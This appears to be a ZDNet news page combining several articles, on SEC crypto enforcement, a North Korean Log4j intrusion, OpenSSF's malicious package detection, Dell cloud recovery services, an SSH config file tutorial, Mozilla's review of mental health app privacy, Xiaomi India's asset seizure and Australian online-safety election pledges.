Information Technology

Written by

Aimee Chanthadavong, Senior Journalist

Aimee Chanthadavong
Senior Journalist

Since completing a degree in journalism, Aimee has had her fair share of covering various topics, including business, retail, manufacturing, and travel. She continues to expand her repertoire as a tech journalist with ZDNet.

Full Bio

Image: snjivo — Shutterstock
The US Securities and Exchange Commission (SEC) has announced that it will bolster the size of its enforcement units that target crypto assets and cyber-related threats.The unit, formerly known as the cyber unit, will be renamed as the crypto assets and cyber unit and will continue to reside in the Division of Enforcement. It will also gain 20 additional team members, taking the unit’s total headcount to 50.These additional roles will include fraud analysts, supervisors, investigative staff attorneys, and trial counsels, and are expected to focus on investigating violations related to crypto asset offerings, exchanges, lending and staking productions, as well as decentralized finance platforms, non-fungible tokens, and stablecoins.”The US has the greatest capital markets because investors have faith in them, and as more investors access the crypto markets, it is increasingly important to dedicate more resources to protecting them,” SEC chair Gary Gensler said. “The Division of Enforcement’s Crypto Assets and Cyber Unit has successfully brought dozens of cases against those seeking to take advantage of investors in crypto markets. By nearly doubling the size of this key unit, the SEC will be better equipped to police wrongdoing in the crypto markets while continuing to identify disclosure and controls issues with respect to cybersecurity.”According to SEC, since the unit’s creation in 2017, it has brought more than 80 enforcement actions related to fraudulent and unregistered crypto asset offerings and platforms, resulting in fines totalling more than $2 billion. One of these most recent cases was in February when the SEC found that crypto lender BlockFi operated for 18 months as an unregistered investment company.The company offered BlockFi Interest Accounts (BIAs) — where users lent crypto assets back to BlockFi for a variable monthly interest payment — which the SEC found were securities, and therefore the BlockFi needed to register with the regulator.BlockFi was also found to have made a false and misleading statement for over two years on its site related to the level of risk in loan portfolio and lending activity.Along with the findings, BlockFi agreed to pay a $50 million penalty to settle with the SEC and another $50 million to settle similar charges in 32 states. It also agreed to halt unregistered products, seek registration of new lending production, and was given 60 days to bring its business into compliance.Related Coverage More

A North Korean hacking and cyber-espionage operation breached the network of an engineering firm linked to military and energy organisations by exploiting a cybersecurity vulnerability in Log4j. First detailed in December, the vulnerability (CVE-2021-44228) allows attackers to remotely execute code and gain access to systems that use Log4j, a widely used Java logging library. The ubiquitous nature of Log4j meant cybersecurity agencies urged organisations globally to apply security updates as quickly as possible, but months on from disclosure, many are still vulnerable to the flaw. 

ZDNet Recommends

According to cybersecurity researchers at Symantec, one of those companies that was still vulnerable was an undisclosed engineering firm that works in the energy and military sectors. That vulnerability resulted in the company being breached when attackers exploited the gap on a public-facing VMware View server in February this year. From there, attackers were able to move around the network and compromise at least 18 computers. SEE: Google: Multiple hacking groups are using the war in Ukraine as a lure in phishing attemptsAnalysis by Symantec researchers suggests that the campaign is by a group they call Stonefly, also known as DarkSeoul, BlackMine, Operation Troy, and Silent Chollima, which is an espionage group working out of North Korea.  Other cybersecurity researchers have suggested that Stonefly has links with Lazarus Group, North Korea’s most infamous hacking operation. But while Lazarus Group’s activity often focuses on stealing money and cryptocurrency, Stonefly is a specialist espionage operation that researchers say engages in highly selective attacks “against targets that could yield intelligence to assist strategically important sectors” – including energy, aerospace, and military. “The group’s capabilities and its narrow focus on acquiring sensitive information make it one of the most potent North Korean cyber-threat actors operating today,” warn researchers at Symantec. Stonefly has existed in some capacity since 2009, but in recent years it has doubled down on targeting highly sensitive information and intellectual property. This is achieved by deploying password-stealers and trojan malware on compromised networks. In the case of the undisclosed engineering firm, the first malware had been dropped onto the network within hours of the initial compromise. Among the tools deployed in this incident was an updated version of Stonefly’s custom Preft backdoor malware. The payload is delivered in stages. When fully executed, it becomes an HTTP remote access tool (RAT) capable of downloading and uploading files and information, along with the ability to download additional payloads, as well as uninstalling itself when the malware is no longer needed. Alongside the Preft backdoor, Stonefly also deployed a custom-developed information-stealer that the attackers planned to use an alternative means of exfiltration. SEE: These are the problems that cause headaches for bug bounty huntersStonefly has been active for over a decade and it’s unlikely their attacks will stop soon, particularly as the group has a history of developing new tactics and techniques. While Stonefly is classified as a powerful state-backed hacking group, in this instance, they didn’t need advanced techniques to breach a network, they simply took advantage of an unpatched critical security vulnerability. To help make sure known vulnerabilities like Log4j can’t be exploited by state-backed hacking groups or cyber criminals, organisations should ensure that security updates for applications and software are rolled out as soon as possible. In the case of the firm above, this process would have involved applying the available patches for VMware servers, which were available before the attack happened.  Other cybersecurity protocols, such as providing users with multi-factor authentication, can also help prevent attacks that take advantage of stolen passwords to move around networks.  MORE ON CYBERSECURITY More

Google has detailed some of the work done to find malicious code packages that have been sneaked into bigger open-source software projects. The Package Analysis Project is one of the software supply chain initiatives from the the Linux Foundation’s Open Source Security Foundation (OpenSSF) that should help automate the process of identifying malicious packages distributed on popular package repositories, such as npm for JavaScript and PyPl for Python. It runs a dynamic analysis of all packages uploaded to popular open-source repositories. It aims to provide data about common types of malicious packages and inform those working on open-source software supply chain security about how best to improve it. “Unlike mobile app stores that can scan for and reject malicious contributions, package repositories have limited resources to review the thousands of daily updates and must maintain an open model where anyone can freely contribute. As a result, malicious packages like ua-parser-js, and node-ipc are regularly uploaded to popular repositories despite their best efforts, with sometimes devastating consequences for users,” Caleb Brown of Google’s Open Source Security Team explains in a blogpost.  

Open Source

“Despite open-source software’s essential role in all software built today, it’s far too easy for bad actors to circulate malicious packages that attack the systems and users running that software.”SEE: Google: Multiple hacking groups are using the war in Ukraine as a lure in phishing attemptsThe Package Analysis project identified more than 200 malicious packages in one month, according to OpenSFF. For example, it found token theft attacks on Discord users that were distributed on PyPl and npm. The PyPl package “discordcmd”, for example, attacks the Discord Windows client via a backdoor downloaded from GitHub and installed on the Discord app to steal Discord tokens.   Attackers distribute malicious packages on npm and PyPl often enough that it’s something OpenSSF, which Google is a member of, decided it needed to be addressed. In March, researchers found hundreds of malicious packages on npm that were used to target developers using Microsoft’s Azure cloud, most of which contained typosquatting and dependency confusion attacks. Both types are social-engineering attacks that exploit repetitive steps when developers frequently update a large number of dependencies. Dependency confusion attacks rely on unusually high version numbers for a package that in fact may have no previous version available.  OpenSSF says most of the malicious packages it detected were dependency-confusion and typo-squatting attacks. But the project believes most of these are likely the work of security researchers participating in bug bounties. “The packages found usually contain a simple script that runs during install and calls home with a few details about the host. These packages are most likely the work of security researchers looking for bug bounties, since most are not exfiltrating meaningful data except the name of the machine or a username, and they make no attempt to disguise their behavior,” OpenSSF and Google note.  OpenSSF notes that any of these packages “could have done far more to hurt the unfortunate victims who installed them, so Package Analysis provides a countermeasure to these kinds of attacks.”The recent Log4j flaw highlighted the general risks of software supply chain security in open source. The component was embedded in tens of thousands of enterprise applications and prompted a massive and urgent clean-up by the US government. Microsoft last week also highlighted the role of software supply chain attacks carried out by Russian state-backed hackers in connection with military attacks on Ukraine.   This February, Google and Microsoft pumped $5 million into OpenSSF’s Alpha-Omega Project to tackle supply chain security. The Alpha side works with maintainers of the most critical open-source projects, while the Omega side will select at least 10,000 widely deployed open-source programs for automated security analysis. More

Written by

Aimee Chanthadavong, Senior Journalist

Aimee Chanthadavong
Senior Journalist

Since completing a degree in journalism, Aimee has had her fair share of covering various topics, including business, retail, manufacturing, and travel. She continues to expand her repertoire as a tech journalist with ZDNet.

Full Bio

on May 2, 2022

| Topic: Cloud

One year on from unveiling its Apex-as-a-service portfolio, Dell Technologies is bolstering the portfolio to move beyond infrastructure and target more workload-based solutions, with the launch of Apex Cyber Recovery. The service is designed to streamline the deployment of cyber recovery solutions through standardised configurations and recovery options. “With Apex Cyber Recovery, customers can feel confident in the ability to recover from a destructive cyber attack and achieve more agility by offloading the day-to-day management of data protection. Customers get more resiliency from an isolated, immutable, and intelligent data vault,” Dell Apex product management vice president Chad Dunn told media during a briefing on Apex. Apex Cyber Recovery is initially being made available in the US with plans for broader availability later this year. The tech giant is also extending its reach in the multi-cloud ecosystem, starting with the release of PowerProtect Cyber Recovery for Microsoft Azure on the Azure Marketplace. Dell said it will allow organisations to deploy an isolated cyber vault in the public cloud, so that if recovery is necessary, they can do so back to their main corporate data centre, an Azure private network, or a clean environment within Azure. The release comes off the back of Dell recently delivering a similar offering for Amazon Web Services (AWS). On AWS, Dell has announced the launch of CyberSense on AWS Marketplace to use analytics, metadata and machine learning to proactively detect, diagnose and speed up data recovery when an attack has occurred, as well as identify the last known uncorrupted copy of data to recover from. Both PowerProtect Cyber Recovery for Microsoft Azure and CyberSense for Dell PowerProtect Cyber Recovery for AWS will be globally available in Q2. Additionally, Dell has drummed up a new strategic partnership with Snowflake, so that joint customers can for the first time leverage Snowflakes’ cloud-based analytics for on-premise data and gain more insights. Jon Siegal, the company’s ISG product marketing VP, explained customers will be able to connect Dell’s object storage to Snowflakes in two ways. “The first way is by running snowflakes analytics against Dell’s on-premise object storage without moving the data to the cloud … it’s really for customers who don’t want to move their data to the cloud, whether it’s for compliance, security, control, data sovereignty reasons,” he said. “Secondly, customers that have the ability also to connect their on-prem Dell object storage to Snowflake by simply copying Dell’s on-premises object data to the Snowflake cloud, so it can be analysed in Snowflake’s cloud itself.” Dell also took the opportunity to provide an update on Project Alpine that was introduced at the start of the year. Siegal said from the second-half of this year, Dell will be introducing data mobility and the same consistent management experience across on-premise and public cloud environments. He added customers will be able to “power up” their multi-cloud environments by leveraging Dell’s data services capabilities found its storage platforms, such as PowerStore, PowerScale, PowerFlex, and ObjectScale. Related Coverage More

Written by

Jack Wallen, Contributing Writer

Jack Wallen
Contributing Writer

Jack Wallen is what happens when a Gen Xer mind-melds with present-day snark. Jack is a seeker of truth and a writer of words with a quantum mechanical pencil and a disjointed beat of sound and soul.

Full Bio

Secure Shell (SSH) is one of those tools every Linux user will probably work with at some point. With SSH you can easily (and securely) log into remote servers and desktops to administer, develop, and check up on those machines.Using SSH is as simple as:ssh jack@192.168.1.11
Or even just:ssh 192.168.1.11
Of course, you would exchange the IP address for the address (or domain) of the machine you need to access. 

ZDNet Recommends

The best Linux Foundation classes

Want a good tech job? Then you need to know Linux and open-source software. One of the best ways to learn is via a Linux Foundation course.

SSH gets a bit less simple when you have numerous machines you access with different configurations (such as different usernames or SSH authentication keys). Imagine if you had 20 or so different servers you had to log into daily. Not only would you have to keep track of the IP addresses or domains of those servers, but you’d also have to remember what usernames or authentication keys were used. That alone could get rather overwhelming.Thankfully, SSH allows you to create a config file to house all of that information. So, instead of having to type something like ssh olivia@192.168.1.100 -p 2222, you could simply type ssh web1. Let me show you how this is done.Creating the SSH config fileLog in to the Linux machine you use to SSH into all of those remote machines. Open a terminal window and create the new configuration file with the command shown in Figure A.Figure ACreating the new SSH config file with the help of nano.Since this is a new file, it’ll be a blank canvas to which we can start adding configurations for servers. Let’s say you want to configure the following remote servers:web1 at 192.168.1.100 with user oliviadb1 at 192.168.1.101 with user nathan and SSH key ~/.ssh/id_nathandocker1 at 192.168.1.102 with user lilly on port 2222Our first entry will look like this:Host “web1”
Hostname “192.168.1.100”
User olivia
If you save and close the file at this point, you could SSH into 192.168.1.100 with the command:ssh web1
Let’s go ahead and configure the next two entries, which will look like this:Host db1
Hostname “192.168.1.101”
User nathan
IdentityFile ~/.ssh/id_nathan
PubkeyAuthentication yes

Host docker1
Hostname “192.168.1.102”
User lilly
Port 2222
Save and close the file. You can now secure shell into those machines with the commands:ssh web1
ssh db1
ssh docker1
You can use whatever nickname you need for each host, just make them memorable, so you don’t forget which machine you’re trying to reach and have to constantly reference the config file to jar your memory.Let’s say, however, that you use the same username on all your remote servers, but you use a different username on your local machine. For example, your local machine username might be jack but you’ve created the admin user on all of your remote servers. You could create a single entry for all of those servers with a wildcard in the IP address like this:Host 192.168.1.*
User admin
The above configuration would be placed at the top of your config file.You could then configure each server individually as needed, leaving out the User option. For example, if both servers at 192.168.1.200 and 192.168.1.201 use SSH key authentication, you could configure entries like so:Host web2
Hostname 192.168.1.200
IdentityFile ~/.ssh/id_admin
PubkeyAuthentication yes

Host web3
Hostname 192.168.1.201
IdentityFile ~/.ssh/id_admin
PubkeyAuthentication yes
Because we applied user admin to the entire range of machines on IP address scheme 192.168.1.x, that username will be applied to all connections. You can also override that global configuration by adding a User configuration line on an as-needed basis.The SSH config file allows for several other options (all of which can be read about in the official SSH config documentation), but these examples shown above should be everything you need to get going with the SSH config file. And that’s all there is to using the SSH config file to help make your remote access with Secure Shell even easier.

Jack Wallen: How To More

An investigation into mental health and prayer apps has revealed a disturbing lack of concern surrounding user security and privacy.

On Monday, Mozilla released the findings of a new study into these types of apps, which often deal with sensitive topics including depression, mental health awareness, anxiety, domestic violence, PTSD, and more, alongside religion-themed services.According to Mozilla’s latest *Privacy Not Included guide, despite the deeply personal information these apps manage, they “routinely share data, allow weak passwords, target vulnerable users with personalized ads, and feature vague and poorly written privacy policies.” In a study of 32 applications geared toward mental health and religion, the organization found that 25 of them did not meet Mozilla’s Minimum Security Standards. These standards act as a benchmark for the *Privacy Not Included reports. The mismanagement or unauthorized sharing and sale of user data, vague data management policies, a lack of encryption, weak password policies, no clear vulnerability management system, and other lax security policies can all downgrade a vendor product in the eyes of Mozilla. If an app or service fails to meet these basic requirements, they are slapped with the “*Privacy Not Included” warning label. The mental health and prayer-related apps have received an accolade — but not one you’d covet. The company says:”When it comes to protecting people’s privacy and security, mental health and prayer apps are worse than any other product category Mozilla researchers have reviewed over the past six years.” The organization examined apps including Talkspace, Better Help, Calm, Glorify, 7 Cups, Wysa, Headspace, and Better Stop Suicide. As a result, each app now has a dedicated space that can be accessed to find out more about the software’s privacy and security rating. For example, Better Stop Suicide, a suicide prevention app, failed Mozilla’s test. “Holy vague and messy privacy policy Batman! Better Stop Suicide’s privacy policy is bad,” Mozilla says. “Like, get a failing grade from your high school English teacher bad.” While the app gathers some personal information and says that users can reach out to them if they have further queries, they did not respond to Mozilla’s attempts at contact and did not mention who “trusted partners” were when data sharing. Only two applications on the list, PTSD Coach and the AI chatbot Wysa, seemed to take data management and user privacy seriously. “The vast majority of mental health and prayer apps are exceptionally creepy,” commented Jen Caltrider, Mozilla’s *Privacy Not Included lead. “They track, share, and capitalize on users’ most intimate personal thoughts and feelings, like moods, mental state, and biometric data. Turns out, researching mental health apps is not good for your mental health, as it reveals how negligent and craven these companies can be with our most intimate personal information.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Image: Xiaomi
India’s anti-money laundering agency, the Directorate of Enforcement (ED), has seized assets worth ₹5551.27 crore (around $725 million) from Xiaomi India after it found the company had broken foreign exchange laws. In 2014, the company began operations in India and is alleged to have commenced the illegal activity in 2015. The ED claimed that Xiaomi India remitted foreign currency to three off-shore entities under the guise of royalties, with one of those including a company within the Xiaomi group, whilst the others were US-based. Further, the ED stated that the payments were made “on the instructions of their Chinese parent group entities”.Xiaomi India responded via Twitter, claiming that their financial processes are compliant with Indian laws and regulations.”We believe our royalty payments and statements to the bank are all legit and truthful,” said the company in its response. “These royalty payments that Xiaomi India made were for the in-licensed technologies and IPs used in our Indian version products. It is a legitimate commercial arrangement for Xiaomi India to make such royalty payments.” Xiaomi India did, however, commit “to working closely with government authorities to clarify any misunderstandings”.After experiencing 83% year-on-year growth during the 2021 second quarter, parent-company Xiaomi achieved 17% market share for smartphones, surpassing Apple, and eventually Samsung, to briefly take the number one spot in the global smartphone market, according to Counterpoint Research.RELATED COVERAGE More

Written by

Aimee Chanthadavong, Senior Journalist

Aimee Chanthadavong
Senior Journalist

Since completing a degree in journalism, Aimee has had her fair share of covering various topics, including business, retail, manufacturing, and travel. She continues to expand her repertoire as a tech journalist with ZDNet.

Full Bio

Investing over AU$33 million to enhance eSafety capabilities and legislating the proposed anti-trolling laws are just some of the policies the Coalition government has pledged to follow up if it is re-elected at the upcoming federal election on May 21. Specifically, the policy includes AU$23 million to raise awareness of the eSafety Commissioner’s support for Australian schools, provide training programs for teachers, improve online safety resources for schools, and enhance support for schools with external online safety providers. It also includes an additional AU$10 million for the eSafety Commission to further expand coordination with other regulatory and law enforcement agencies, ensuring victims “tell-us-once” and are supported with the right service. Additionally, the Morrison government said it will continue to stick with legislating proposed anti-trolling laws, touting that it will ensure social media companies are held accountable, while Australians are given more power to deal with harmful defamatory comments from anonymous trolls. Read: Inman Grant’s reappointment as eSafety commissioner comes with new powers The proposed laws, however, have been blasted by senators, online abuse victims, and organisations including the eSafety Commission for being too hard to access and unclear, and would require more work if it is to become law. The government said it also wants to introduce a binding industry code under the Online Safety Act to ensure smartphones and tablet devices have “strong” parental controls installed that are easier to find and activate — and harder for kids to bypass — if industry does not act within 12 months. An additional AU$2 million has also been earmarked under the Online Safety Grants to benefit online safety projects that support women and girls in culturally and linguistically diverse communities. “Our kids should be able to learn, be entertained, or connect with their friends and family without facing abuse, humiliation or online predators. The online world cannot be a cowards’ cavern where the rules of the real world do not exist,” Prime Minister Scott Morrison said. “Big tech and social media giants must be held to account. Our plan will force them to do more – they cannot create it, and wash their hands of all consequences of it. “Our plan will also ensure parents can protect their kids online with strong parental controls, help to prevent harm by raising awareness in every school, and improve our support for those harmed online.” See also: Musk’s Twitter goal of authenticating all users is good for ending bots but bad for humansAt the same time, the government said a new AU$3.8 million funding, delivered through the 2022-23 Budget, would be handed to youth mental health organisation Batyr to expand its OurHerd digital platform, which endeavours to provide young people with a safe digital space to view and learn from positive mental health stories shared by peers. The funding would build on the government’s previous investment of AU$2.8 million through the 2019-20 Budget to develop OurHerd. Minister for Health and Aged Care Greg Hunt said the additional funding for OurHerd will support approximately 60,000 young people aged 14-30 years with mild to moderate mental health needs, their families, carers and communities. “Through peer-to-peer education and the sharing of stories of lived experience, Batyr is helping more young people to get help before they reach a crisis point,” Minister Hunt said. “This early support reduces the lifelong impacts of mental illness and saves lives.” Meanwhile, the Opposition, as part of its election campaign, has vowed to establish a Royal Commission into robo-debt by the end of this year, with consultation to begin after the election. It envisions the Royal Commission will identify who was responsible for the robot-debt scheme; establish what advice, and what processes informed the design and implementation; investigate the handling of complaints for the scheme; determine how much the implementation, suspension, and wind-back of the scheme cost taxpayers; investigate the harm caused to Australians; and investigate the use of third-party debt collectors under the scheme. Labor has been advocating for a Royal Commission into the government’s robo-debt disaster since June 2020. “We still do not know how this reckless scheme was unleashed. We do not know whether poor legal advice was given or whether legal advice was simply never sought,” Shadow Minister for Government Services Bill Shorten said.  “We do not know if public servants were inappropriately heavied and politicised. And without knowing the true origins we do not know what safeguards could be put in place to prevent a repeat.”  In May 2020, the federal government conceded its data-matching Online Compliance Intervention (OCI) initiative, dubbed robo-debt, got around 470,000 “debts” wrong.  Read also: Federal Court approves AU$112m compensation in settlement for robo-debt failure The OCI program automatically compared the income declared to the Australian Taxation Office (ATO) against income declared to Centrelink, which resulted in debt notices, along with a 10% recovery fee, being issued whenever a disparity in government data was detected. Centrelink’s OCI program from 1 July 2016 through 31 August 2019 saw 1,159,662 assessments initiated using the automated data-matching technique. Separately, the Opposition also said it will launch a user audit of the myGov government services digital portal to “take a fresh look” at how well it is performing and help identify what changes and improvements can be made.  “Millions of Australians interact with myGov everyday and rely on it to provide essential services. It’s not up to scratch, and Australians deserve better. That’s why we will review myGov, and make improvements where necessary,” Opposition leader Anthony Albanese stated. Related Coverage More